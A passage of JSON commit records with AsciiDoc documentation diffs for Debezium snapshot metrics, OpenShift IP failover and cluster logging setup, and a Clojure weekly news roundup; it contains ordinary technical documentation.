2015-08-11-Un-peu-de-pratique.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_file":"_posts\/2015-08-11-Un-peu-de-pratique.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"3074212bef96af08d6ad8e7bbe47a1e93584dfd4","subject":"DBZ-5748 Remove note that refers to 
incremental snapshots as TP feature","message":"DBZ-5748 Remove note that refers to incremental snapshots as TP feature\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/partials\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc","new_file":"documentation\/modules\/ROOT\/partials\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc","new_contents":"The connector also provides the following additional snapshot metrics when an incremental snapshot is executed:\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-insnap-metric-chunkid_{context}]]<<connectors-insnap-metric-chunkid_{context}, `ChunkId`>>\n|`string`\n|The identifier of the current snapshot chunk.\n\n|[[connectors-insnap-metric-chunkfrom_{context}]]<<connectors-insnap-metric-chunkfrom_{context}, `ChunkFrom`>>\n|`string`\n|The lower bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-chunkto_{context}]]<<connectors-insnap-metric-chunkto_{context}, `ChunkTo`>>\n|`string`\n|The upper bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-tablefrom_{context}]]<<connectors-insnap-metric-tablefrom_{context}, `TableFrom`>>\n|`string`\n|The lower bound of the primary key set of the currently snapshotted table.\n\n|[[connectors-insnap-metric-tableto_{context}]]<<connectors-insnap-metric-tableto_{context}, `TableTo`>>\n|`string`\n|The upper bound of the primary key set of the currently snapshotted table.\n\n|===\n","old_contents":"The connector also provides the following additional snapshot metrics when an incremental snapshot is executed:\n\n[cols=\"45%a,25%a,30%a\",options=\"header\"]\n|===\n|Attributes |Type |Description\n\n|[[connectors-insnap-metric-chunkid_{context}]]<<connectors-insnap-metric-chunkid_{context}, `ChunkId`>>\n|`string`\n|The identifier of the current snapshot chunk.\n\n|[[connectors-insnap-metric-chunkfrom_{context}]]<<connectors-insnap-metric-chunkfrom_{context}, `ChunkFrom`>>\n|`string`\n|The lower bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-chunkto_{context}]]<<connectors-insnap-metric-chunkto_{context}, `ChunkTo`>>\n|`string`\n|The upper bound of the primary key set defining the current chunk.\n\n|[[connectors-insnap-metric-tablefrom_{context}]]<<connectors-insnap-metric-tablefrom_{context}, `TableFrom`>>\n|`string`\n|The lower bound of the primary key set of the currently snapshotted table.\n\n|[[connectors-insnap-metric-tableto_{context}]]<<connectors-insnap-metric-tableto_{context}, `TableTo`>>\n|`string`\n|The upper bound of the primary key set of the currently snapshotted table.\n\n|===\n\nifdef::product[]\n[IMPORTANT]\n====\nIncremental snapshots is a Technology Preview feature only. Technology Preview features are not supported with Red Hat production service level agreements (SLAs) and might not be functionally complete. Red Hat does not recommend using them in production. These features provide early access to upcoming product features, enabling customers to test functionality and provide feedback during the development process. 
For more information about the support scope of Red Hat Technology Preview features, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview[https:\/\/access.redhat.com\/support\/offerings\/techpreview].\n====\nendif::product[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae6508579d7f65db913e6cfbc2a0f7c156850f17","subject":"BZ1989549-Fixed keepalived-ipfailover image URL","message":"BZ1989549-Fixed keepalived-ipfailover image URL\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-ipfailover-configuration.adoc","new_file":"modules\/nw-ipfailover-configuration.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-ipfailover.adoc\n\n[id=\"nw-ipfailover-configuration_{context}\"]\n= Configuring IP failover\n\nAs a cluster administrator, you can configure IP failover on an entire cluster, or on a subset of nodes, as defined by the label selector. You can also configure multiple IP failover deployment configurations in your cluster, where each one is independent of the others.\n\nThe IP failover deployment configuration ensures that a failover pod runs on each of the nodes matching the constraints or the label used.\n\nThis pod runs Keepalived, which can monitor an endpoint and use Virtual Router Redundancy Protocol (VRRP) to fail over the virtual IP (VIP) from one node to another if the first node cannot reach the service or endpoint.\n\nFor production use, set a `selector` that selects at least two nodes, and set `replicas` equal to the number of selected nodes.\n\n.Prerequisites\n\n* You are logged in to the cluster with a user with `cluster-admin` privileges.\n* You created a pull secret.\n\n.Procedure\n\n\/\/. Create an {product-title} pull secret\n\/\/+\n. Create an IP failover service account:\n+\n[source,terminal]\n----\n$ oc create sa ipfailover\n----\n+\n. Update security context constraints (SCC) for `hostNetwork`:\n+\n[source,terminal]\n----\n$ oc adm policy add-scc-to-user privileged -z ipfailover\n$ oc adm policy add-scc-to-user hostnetwork -z ipfailover\n----\n+\n. 
Create a deployment YAML file to configure IP failover:\n+\n.Example deployment YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: ipfailover-keepalived <1>\n labels:\n ipfailover: hello-openshift\nspec:\n strategy:\n type: Recreate\n replicas: 2\n selector:\n matchLabels:\n ipfailover: hello-openshift\n template:\n metadata:\n labels:\n ipfailover: hello-openshift\n spec:\n serviceAccountName: ipfailover\n privileged: true\n hostNetwork: true\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n containers:\n - name: openshift-ipfailover\n image: quay.io\/openshift\/origin-keepalived-ipfailover\n ports:\n - containerPort: 63000\n hostPort: 63000\n imagePullPolicy: IfNotPresent\n securityContext:\n privileged: true\n volumeMounts:\n - name: lib-modules\n mountPath: \/lib\/modules\n readOnly: true\n - name: host-slash\n mountPath: \/host\n readOnly: true\n mountPropagation: HostToContainer\n - name: etc-sysconfig\n mountPath: \/etc\/sysconfig\n readOnly: true\n - name: config-volume\n mountPath: \/etc\/keepalive\n env:\n - name: OPENSHIFT_HA_CONFIG_NAME\n value: \"ipfailover\"\n - name: OPENSHIFT_HA_VIRTUAL_IPS <2>\n value: \"1.1.1.1-2\"\n - name: OPENSHIFT_HA_VIP_GROUPS <3>\n value: \"10\"\n - name: OPENSHIFT_HA_NETWORK_INTERFACE <4>\n value: \"ens3\" #The host interface to assign the VIPs\n - name: OPENSHIFT_HA_MONITOR_PORT <5>\n value: \"30060\"\n - name: OPENSHIFT_HA_VRRP_ID_OFFSET <6>\n value: \"0\"\n - name: OPENSHIFT_HA_REPLICA_COUNT <7>\n value: \"2\" #Must match the number of replicas in the deployment\n - name: OPENSHIFT_HA_USE_UNICAST\n value: \"false\"\n #- name: OPENSHIFT_HA_UNICAST_PEERS\n #value: \"10.0.148.40,10.0.160.234,10.0.199.110\"\n - name: OPENSHIFT_HA_IPTABLES_CHAIN <8>\n value: \"INPUT\"\n #- name: OPENSHIFT_HA_NOTIFY_SCRIPT <9>\n # value: \/etc\/keepalive\/mynotifyscript.sh\n - name: OPENSHIFT_HA_CHECK_SCRIPT <10>\n value: \"\/etc\/keepalive\/mycheckscript.sh\"\n - name: OPENSHIFT_HA_PREEMPTION <11>\n value: \"preempt_delay 300\"\n - name: OPENSHIFT_HA_CHECK_INTERVAL <12>\n value: \"2\"\n livenessProbe:\n initialDelaySeconds: 10\n exec:\n command:\n - pgrep\n - keepalived\n volumes:\n - name: lib-modules\n hostPath:\n path: \/lib\/modules\n - name: host-slash\n hostPath:\n path: \/\n - name: etc-sysconfig\n hostPath:\n path: \/etc\/sysconfig\n # config-volume contains the check script\n # created with `oc create configmap keepalived-checkscript --from-file=mycheckscript.sh`\n - configMap:\n defaultMode: 0755\n name: keepalived-checkscript\n name: config-volume\n imagePullSecrets:\n - name: openshift-pull-secret <13>\n----\n<1> The name of the IP failover deployment.\n<2> The list of IP address ranges to replicate. This must be provided. For example, `1.2.3.4-6,1.2.3.9`.\n<3> The number of groups to create for VRRP. If not set, a group is created for each virtual IP range specified with the `OPENSHIFT_HA_VIP_GROUPS` variable.\n<4> The interface name that IP failover uses to send VRRP traffic. By default, `eth0` is used.\n<5> The IP failover pod tries to open a TCP connection to this port on each VIP. If connection is established, the service is considered to be running. If this port is set to `0`, the test always passes. The default value is `80`.\n<6> The offset value used to set the virtual router IDs. Using different offset values allows multiple IP failover configurations to exist within the same cluster. 
The default offset is `0`, and the allowed range is `0` through `255`.\n<7> The number of replicas to create. This must match `spec.replicas` value in IP failover deployment configuration. The default value is `2`.\n<8> The name of the `iptables` chain to automatically add an `iptables` rule to allow the VRRP traffic on. If the value is not set, an `iptables` rule is not added. If the chain does not exist, it is not created, and Keepalived operates in unicast mode. The default is `INPUT`.\n<9> The full path name in the pod file system of a script that is run whenever the state changes.\n<10> The full path name in the pod file system of a script that is periodically run to verify the application is operating.\n<11> The strategy for handling a new higher priority host. The default value is `preempt_delay 300`, which causes a Keepalived instance to take over a VIP after 5 minutes if a lower-priority master is holding the VIP.\n<12> The period, in seconds, that the check script is run. The default value is `2`.\n<13> Create the pull secret before creating the deployment, otherwise you will get an error when creating the deployment.\n\/\/\/\/\n+\n.Example service YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n name: ipfailover-keepalived-service\nspec:\n ports:\n - port: 1985\n targetPort: 1985\n name: todo\n - port: 112\n targetPort: 112\n name: vrrp\n selector:\n ipfailover: hello-openshift\n externalIPs:\n - 1.1.1.1\n - 1.1.1.2\n----\n\/\/\/\/\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-ipfailover.adoc\n\n[id=\"nw-ipfailover-configuration_{context}\"]\n= Configuring IP failover\n\nAs a cluster administrator, you can configure IP failover on an entire cluster, or on a subset of nodes, as defined by the label selector. You can also configure multiple IP failover deployment configurations in your cluster, where each one is independent of the others.\n\nThe IP failover deployment configuration ensures that a failover pod runs on each of the nodes matching the constraints or the label used.\n\nThis pod runs Keepalived, which can monitor an endpoint and use Virtual Router Redundancy Protocol (VRRP) to fail over the virtual IP (VIP) from one node to another if the first node cannot reach the service or endpoint.\n\nFor production use, set a `selector` that selects at least two nodes, and set `replicas` equal to the number of selected nodes.\n\n.Prerequisites\n\n* You are logged in to the cluster with a user with `cluster-admin` privileges.\n* You created a pull secret.\n\n.Procedure\n\n\/\/. Create an {product-title} pull secret\n\/\/+\n. Create an IP failover service account:\n+\n[source,terminal]\n----\n$ oc create sa ipfailover\n----\n+\n. Update security context constraints (SCC) for `hostNetwork`:\n+\n[source,terminal]\n----\n$ oc adm policy add-scc-to-user privileged -z ipfailover\n$ oc adm policy add-scc-to-user hostnetwork -z ipfailover\n----\n+\n. 
Create a deployment YAML file to configure IP failover:\n+\n.Example deployment YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: ipfailover-keepalived <1>\n labels:\n ipfailover: hello-openshift\nspec:\n strategy:\n type: Recreate\n replicas: 2\n selector:\n matchLabels:\n ipfailover: hello-openshift\n template:\n metadata:\n labels:\n ipfailover: hello-openshift\n spec:\n serviceAccountName: ipfailover\n privileged: true\n hostNetwork: true\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n containers:\n - name: openshift-ipfailover\n image: quay.io\/openshift\/ose-keepalived-ipfailover:latest\n ports:\n - containerPort: 63000\n hostPort: 63000\n imagePullPolicy: IfNotPresent\n securityContext:\n privileged: true\n volumeMounts:\n - name: lib-modules\n mountPath: \/lib\/modules\n readOnly: true\n - name: host-slash\n mountPath: \/host\n readOnly: true\n mountPropagation: HostToContainer\n - name: etc-sysconfig\n mountPath: \/etc\/sysconfig\n readOnly: true\n - name: config-volume\n mountPath: \/etc\/keepalive\n env:\n - name: OPENSHIFT_HA_CONFIG_NAME\n value: \"ipfailover\"\n - name: OPENSHIFT_HA_VIRTUAL_IPS <2>\n value: \"1.1.1.1-2\"\n - name: OPENSHIFT_HA_VIP_GROUPS <3>\n value: \"10\"\n - name: OPENSHIFT_HA_NETWORK_INTERFACE <4>\n value: \"ens3\" #The host interface to assign the VIPs\n - name: OPENSHIFT_HA_MONITOR_PORT <5>\n value: \"30060\"\n - name: OPENSHIFT_HA_VRRP_ID_OFFSET <6>\n value: \"0\"\n - name: OPENSHIFT_HA_REPLICA_COUNT <7>\n value: \"2\" #Must match the number of replicas in the deployment\n - name: OPENSHIFT_HA_USE_UNICAST\n value: \"false\"\n #- name: OPENSHIFT_HA_UNICAST_PEERS\n #value: \"10.0.148.40,10.0.160.234,10.0.199.110\"\n - name: OPENSHIFT_HA_IPTABLES_CHAIN <8>\n value: \"INPUT\"\n #- name: OPENSHIFT_HA_NOTIFY_SCRIPT <9>\n # value: \/etc\/keepalive\/mynotifyscript.sh\n - name: OPENSHIFT_HA_CHECK_SCRIPT <10>\n value: \"\/etc\/keepalive\/mycheckscript.sh\"\n - name: OPENSHIFT_HA_PREEMPTION <11>\n value: \"preempt_delay 300\"\n - name: OPENSHIFT_HA_CHECK_INTERVAL <12>\n value: \"2\"\n livenessProbe:\n initialDelaySeconds: 10\n exec:\n command:\n - pgrep\n - keepalived\n volumes:\n - name: lib-modules\n hostPath:\n path: \/lib\/modules\n - name: host-slash\n hostPath:\n path: \/\n - name: etc-sysconfig\n hostPath:\n path: \/etc\/sysconfig\n # config-volume contains the check script\n # created with `oc create configmap keepalived-checkscript --from-file=mycheckscript.sh`\n - configMap:\n defaultMode: 0755\n name: keepalived-checkscript\n name: config-volume\n imagePullSecrets:\n - name: openshift-pull-secret <13>\n----\n<1> The name of the IP failover deployment.\n<2> The list of IP address ranges to replicate. This must be provided. For example, `1.2.3.4-6,1.2.3.9`.\n<3> The number of groups to create for VRRP. If not set, a group is created for each virtual IP range specified with the `OPENSHIFT_HA_VIP_GROUPS` variable.\n<4> The interface name that IP failover uses to send VRRP traffic. By default, `eth0` is used.\n<5> The IP failover pod tries to open a TCP connection to this port on each VIP. If connection is established, the service is considered to be running. If this port is set to `0`, the test always passes. The default value is `80`.\n<6> The offset value used to set the virtual router IDs. Using different offset values allows multiple IP failover configurations to exist within the same cluster. 
The default offset is `0`, and the allowed range is `0` through `255`.\n<7> The number of replicas to create. This must match `spec.replicas` value in IP failover deployment configuration. The default value is `2`.\n<8> The name of the `iptables` chain to automatically add an `iptables` rule to allow the VRRP traffic on. If the value is not set, an `iptables` rule is not added. If the chain does not exist, it is not created, and Keepalived operates in unicast mode. The default is `INPUT`.\n<9> The full path name in the pod file system of a script that is run whenever the state changes.\n<10> The full path name in the pod file system of a script that is periodically run to verify the application is operating.\n<11> The strategy for handling a new higher priority host. The default value is `preempt_delay 300`, which causes a Keepalived instance to take over a VIP after 5 minutes if a lower-priority master is holding the VIP.\n<12> The period, in seconds, that the check script is run. The default value is `2`.\n<13> Create the pull secret before creating the deployment, otherwise you will get an error when creating the deployment.\n\/\/\/\/\n+\n.Example service YAML for IP failover configuration\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n name: ipfailover-keepalived-service\nspec:\n ports:\n - port: 1985\n targetPort: 1985\n name: todo\n - port: 112\n targetPort: 112\n name: vrrp\n selector:\n ipfailover: hello-openshift\n externalIPs:\n - 1.1.1.1\n - 1.1.1.2\n----\n\/\/\/\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0af2fadd8da7290a50ff22e959ae4cfcbce35e59","subject":"add link to deref","message":"add link to deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/23\/deref.adoc","new_file":"content\/news\/2022\/11\/23\/deref.adoc","new_contents":"= Clojure Deref (Nov 23, 2022)\nAlex Miller\n2022-11-23\n:jbake-type: post\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nWelcome to the Clojure Deref! This is a weekly link\/news roundup for the Clojure ecosystem. (https:\/\/twitter.com\/ClojureDeref[@ClojureDeref] https:\/\/clojure.org\/feed.xml[RSS])\n\n== Highlights\n\nIn this week of thanks, thank you to the Clojure community! 
It is a pleasure to present your work every week here and always a surprise how much the community does every single week.\n\n== Podcasts and videos\n\n* https:\/\/cognitect.com\/cognicast\/172[Janet A Carr - Cognicast Episode 172] - Cognicast\n* https:\/\/www.youtube.com\/watch?v=AYKIR1oh62Y[#1: Michiel Borkent @borkdude] - Show Me Your REPL\n* https:\/\/clojure.stream\/podcast[E84 Exoscale with Pierre-Yves Ritschard] - ClojureStream Podcast with Jacek Schae\n* https:\/\/www.youtube.com\/watch?v=B7_3hVF8zSc[Clojure defpure news \ud83d\udcf0 filter-stack-trace for test errors] - Fred Overflow\n* https:\/\/www.youtube.com\/watch?v=2hBl31QP9Pc[Clojure and the Functional Paradigm] - Codurance\n\n== Blogs and articles\n\n* https:\/\/building.nubank.com.br\/talk-james-gosling-java-at-nubank\/[A mind-blowing conversation with James Gosling, Java\u2019s father] - Building Nubank\n* https:\/\/andreyorst.gitlab.io\/posts\/2022-11-21-clojures-coreasync-pipeline-async-off-by-two-error-explained\/[Clojure's core.async pipeline-async off-by-two error explained] - Andrey Listopadov\n* https:\/\/clojure.stream\/workshops\/babashka[Babashka Workshop] - ClojureStream\n\n== Libraries and tools\n\nNew releases and tools this week:\n\n* https:\/\/github.com\/Datomic\/dev.datafy[dev.datafy] 0.1 - Dev-time datafy and nav\n* https:\/\/github.com\/pedestal\/pedestal[pedestal] 0.5.11-beta-1 - The Pedestal Server-side Libraries\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/borkdude\/edamame[edamame] 1.0.16 - Configurable EDN\/Clojure parser with location metadata\n* https:\/\/github.com\/babashka\/nbb[nbb] 1.0.136 - Scripting in Clojure on Node.js using SCI\n* https:\/\/github.com\/clj-commons\/hickory[hickory] 0.7.2 - HTML as data\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/fulcrologic\/fulcro-rad[fulcro-rad] 1.3.9 - Fulcro Rapid Application Development\n* https:\/\/github.com\/fulcrologic\/fulcro-rad-semantic-ui[fulcro-rad-semantic-ui] 1.2.18 - Semantic UI Rendering Plugin for RAD\n* https:\/\/github.com\/BetterThanTomorrow\/calva[calva] https:\/\/github.com\/BetterThanTomorrow\/calva\/releases\/tag\/v2.0.320[2.0.320] - Clojure & ClojureScript Interactive Programming for VS Code\n* https:\/\/github.com\/BetterThanTomorrow\/joyride[joyride] 0.0.23 - Making VS Code Hackable since 2022\n* https:\/\/github.com\/babashka\/scittle[scittle] 0.4.11 - Execute Clojure(Script) directly from browser script tags via SCI\n* https:\/\/git.sr.ht\/~jomco\/select-tree[select-tree] 0.1.0 - Clojure library to recursively select subtrees of collections\n","old_contents":"= Clojure Deref (Nov 23, 2022)\nAlex Miller\n2022-11-23\n:jbake-type: post\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\nWelcome to the Clojure Deref! This is a weekly link\/news roundup for the Clojure ecosystem. (https:\/\/twitter.com\/ClojureDeref[@ClojureDeref] https:\/\/clojure.org\/feed.xml[RSS])\n\n== Highlights\n\nIn this week of thanks, thank you to the Clojure community! 
It is a pleasure to present your work every week here and always a surprise how much the community does every single week.\n\n== Podcasts and videos\n\n* https:\/\/cognitect.com\/cognicast\/172[Janet A Carr - Cognicast Episode 172] - Cognicast\n* https:\/\/www.youtube.com\/watch?v=AYKIR1oh62Y[#1: Michiel Borkent @borkdude] - Show Me Your REPL\n* https:\/\/www.youtube.com\/watch?v=B7_3hVF8zSc[Clojure defpure news \ud83d\udcf0 filter-stack-trace for test errors] - Fred Overflow\n* https:\/\/www.youtube.com\/watch?v=2hBl31QP9Pc[Clojure and the Functional Paradigm] - Codurance\n\n== Blogs and articles\n\n* https:\/\/building.nubank.com.br\/talk-james-gosling-java-at-nubank\/[A mind-blowing conversation with James Gosling, Java\u2019s father] - Building Nubank\n* https:\/\/andreyorst.gitlab.io\/posts\/2022-11-21-clojures-coreasync-pipeline-async-off-by-two-error-explained\/[Clojure's core.async pipeline-async off-by-two error explained] - Andrey Listopadov\n* https:\/\/clojure.stream\/workshops\/babashka[Babashka Workshop] - ClojureStream\n\n== Libraries and tools\n\nNew releases and tools this week:\n\n* https:\/\/github.com\/Datomic\/dev.datafy[dev.datafy] 0.1 - Dev-time datafy and nav\n* https:\/\/github.com\/pedestal\/pedestal[pedestal] 0.5.11-beta-1 - The Pedestal Server-side Libraries\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/borkdude\/edamame[edamame] 1.0.16 - Configurable EDN\/Clojure parser with location metadata\n* https:\/\/github.com\/babashka\/nbb[nbb] 1.0.136 - Scripting in Clojure on Node.js using SCI\n* https:\/\/github.com\/clj-commons\/hickory[hickory] 0.7.2 - HTML as data\n* https:\/\/github.com\/liquidz\/antq[antq] 2.2.962 - Point out your outdated dependencies\n* https:\/\/github.com\/fulcrologic\/fulcro-rad[fulcro-rad] 1.3.9 - Fulcro Rapid Application Development\n* https:\/\/github.com\/fulcrologic\/fulcro-rad-semantic-ui[fulcro-rad-semantic-ui] 1.2.18 - Semantic UI Rendering Plugin for RAD\n* https:\/\/github.com\/BetterThanTomorrow\/calva[calva] https:\/\/github.com\/BetterThanTomorrow\/calva\/releases\/tag\/v2.0.320[2.0.320] - Clojure & ClojureScript Interactive Programming for VS Code\n* https:\/\/github.com\/BetterThanTomorrow\/joyride[joyride] 0.0.23 - Making VS Code Hackable since 2022\n* https:\/\/github.com\/babashka\/scittle[scittle] 0.4.11 - Execute Clojure(Script) directly from browser script tags via SCI\n* https:\/\/git.sr.ht\/~jomco\/select-tree[select-tree] 0.1.0 - Clojure library to recursively select subtrees of collections\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"eee3a254a6efcce80cd7359e2e5efb134d88b516","subject":"OSD: Fix directions to cluster logging instance","message":"OSD: Fix directions to cluster logging instance\n\nI was walking through these instructions today and had to do things a\nbit differently from what the doc said. 
Updated accordingly.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/dedicated-cluster-install-deploy.adoc","new_file":"modules\/dedicated-cluster-install-deploy.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/dedicated-cluster-deploying.adoc\n\n[id=\"dedicated-cluster-install-deploy\"]\n\n= Installing the Cluster Logging and Elasticsearch Operators\n\nYou can use the {product-title} console to install cluster logging by deploying instances of\nthe Cluster Logging and Elasticsearch Operators. The Cluster Logging Operator\ncreates and manages the components of the logging stack. The Elasticsearch Operator\ncreates and manages the Elasticsearch cluster used by cluster logging.\n\n[NOTE]\n====\nThe {product-title} cluster logging solution requires that you install both the\nCluster Logging Operator and Elasticsearch Operator. When you deploy an instance\nof the Cluster Logging Operator, it also deploys an instance of the Elasticsearch\nOperator.\n====\n\nYour OpenShift Dedicated cluster includes 600 GiB of persistent storage that is\nexclusively available for deploying Elasticsearch for cluster logging.\n\nElasticsearch is a memory-intensive application. Each Elasticsearch node needs\n8G of memory for both memory requests and limits. Each Elasticsearch node can\noperate with a lower memory setting, though this is not recommended for\nproduction deployments.\n\n.Procedure\n\n. Install the Elasticsearch Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Elasticsearch* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Install the Cluster Logging Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Cluster Logging* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Verify the operator installations:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Ensure that *Cluster Logging* and *Elasticsearch* Operators are listed in the\n*openshift-logging* project with a *Status* of *InstallSucceeded*.\n+\n[NOTE]\n====\nDuring installation an operator might display a *Failed* status. If the operator then installs with an *InstallSucceeded* message,\nyou can safely ignore the *Failed* message.\n====\n+\nIf either operator does not appear as installed, to troubleshoot further:\n+\n* Switch to the *Operators* \u2192 *Installed Operators* page and inspect\nthe *Status* column for any errors or failures.\n* Switch to the *Workloads* \u2192 *Pods* page and check the logs in each Pod in the\n`openshift-logging` project that is reporting issues.\n\n. Create and deploy a cluster logging instance:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Click the installed *Cluster Logging* Operator.\n\n.. Under the *Details* tab, in the *Provided APIs* section, in the\n*Cluster Logging* box, click *Create Instance* . 
Select the *YAML View*\nradio button and paste the following YAML definition into the window\nthat displays.\n+\n.Cluster Logging Custom Resource (CR)\n[source,yaml]\n----\napiVersion: \"logging.openshift.io\/v1\"\nkind: \"ClusterLogging\"\nmetadata:\n name: \"instance\"\n namespace: \"openshift-logging\"\nspec:\n managementState: \"Managed\"\n logStore:\n type: \"elasticsearch\"\n elasticsearch:\n nodeCount: 3\n storage:\n storageClassName: \"gp2\"\n size: \"200Gi\"\n redundancyPolicy: \"SingleRedundancy\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n resources:\n requests:\n memory: 8G\n visualization:\n type: \"kibana\"\n kibana:\n replicas: 1\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n curation:\n type: \"curator\"\n curator:\n schedule: \"15 * * * *\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n collection:\n logs:\n type: \"fluentd\"\n fluentd: {}\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n----\n\n.. Click *Create* to deploy the logging instance, which creates the Cluster\nLogging and Elasticsearch Custom Resources.\n\n. Verify that the Pods for the Cluster Logging instance deployed:\n\n.. Switch to the *Workloads* \u2192 *Pods* page.\n\n.. Select the *openshift-logging* project.\n+\nYou should see several pods for cluster logging, Elasticsearch, Fluentd, and Kibana similar to the following list:\n+\n* cluster-logging-operator-cb795f8dc-xkckc\n* elasticsearch-cdm-b3nqzchd-1-5c6797-67kfz\n* elasticsearch-cdm-b3nqzchd-2-6657f4-wtprv\n* elasticsearch-cdm-b3nqzchd-3-588c65-clg7g\n* fluentd-2c7dg\n* fluentd-9z7kk\n* fluentd-br7r2\n* fluentd-fn2sb\n* fluentd-pb2f8\n* fluentd-zqgqx\n* kibana-7fb4fd4cc9-bvt4p\n\n. Access the Cluster Logging interface, *Kibana*, from the *Monitoring* \u2192\n*Logging* page of the {product-title} web console.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/dedicated-cluster-deploying.adoc\n\n[id=\"dedicated-cluster-install-deploy\"]\n\n= Installing the Cluster Logging and Elasticsearch Operators\n\nYou can use the {product-title} console to install cluster logging by deploying instances of\nthe Cluster Logging and Elasticsearch Operators. The Cluster Logging Operator\ncreates and manages the components of the logging stack. The Elasticsearch Operator\ncreates and manages the Elasticsearch cluster used by cluster logging.\n\n[NOTE]\n====\nThe {product-title} cluster logging solution requires that you install both the\nCluster Logging Operator and Elasticsearch Operator. When you deploy an instance\nof the Cluster Logging Operator, it also deploys an instance of the Elasticsearch\nOperator.\n====\n\nYour OpenShift Dedicated cluster includes 600 GiB of persistent storage that is\nexclusively available for deploying Elasticsearch for cluster logging.\n\nElasticsearch is a memory-intensive application. Each Elasticsearch node needs\n8G of memory for both memory requests and limits. Each Elasticsearch node can\noperate with a lower memory setting, though this is not recommended for\nproduction deployments.\n\n.Procedure\n\n. Install the Elasticsearch Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Elasticsearch* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Install the Cluster Logging Operator from the OperatorHub:\n\n.. 
In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Cluster Logging* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Verify the operator installations:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Ensure that *Cluster Logging* and *Elasticsearch* Operators are listed in the\n*openshift-logging* project with a *Status* of *InstallSucceeded*.\n+\n[NOTE]\n====\nDuring installation an operator might display a *Failed* status. If the operator then installs with an *InstallSucceeded* message,\nyou can safely ignore the *Failed* message.\n====\n+\nIf either operator does not appear as installed, to troubleshoot further:\n+\n* Switch to the *Operators* \u2192 *Installed Operators* page and inspect\nthe *Status* column for any errors or failures.\n* Switch to the *Workloads* \u2192 *Pods* page and check the logs in each Pod in the\n`openshift-logging` project that is reporting issues.\n\n. Create and deploy a cluster logging instance:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Click the installed *Cluster Logging* Operator.\n\n.. Under the *Overview* tab, click *Create Instance* . Paste the following YAML\ndefinition into the window that displays.\n+\n.Cluster Logging Custom Resource (CR)\n[source,yaml]\n----\napiVersion: \"logging.openshift.io\/v1\"\nkind: \"ClusterLogging\"\nmetadata:\n name: \"instance\"\n namespace: \"openshift-logging\"\nspec:\n managementState: \"Managed\"\n 